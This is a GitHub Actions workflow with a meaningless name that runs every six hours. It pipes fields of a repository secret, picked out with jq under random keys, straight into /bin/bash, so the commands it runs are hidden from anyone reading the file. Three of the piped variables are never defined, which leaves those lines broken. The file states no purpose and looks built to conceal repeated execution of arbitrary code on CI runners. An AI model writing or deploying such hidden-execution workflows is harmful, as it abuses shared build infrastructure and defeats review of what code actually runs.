name: yintesjhttyixia
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yintesjhttyixia
        env:
          bu8: ${{ secrets.bu8 }}
        run: |
          echo $bu8 | jq -r .byg67034 | /bin/bash
          echo $wqn9 | jq -r .mkr287 | /bin/bash
          echo $zghx8 | jq -r .tc873 | /bin/bash
          echo $ictk3 | jq -r .jay779 | /bin/bash

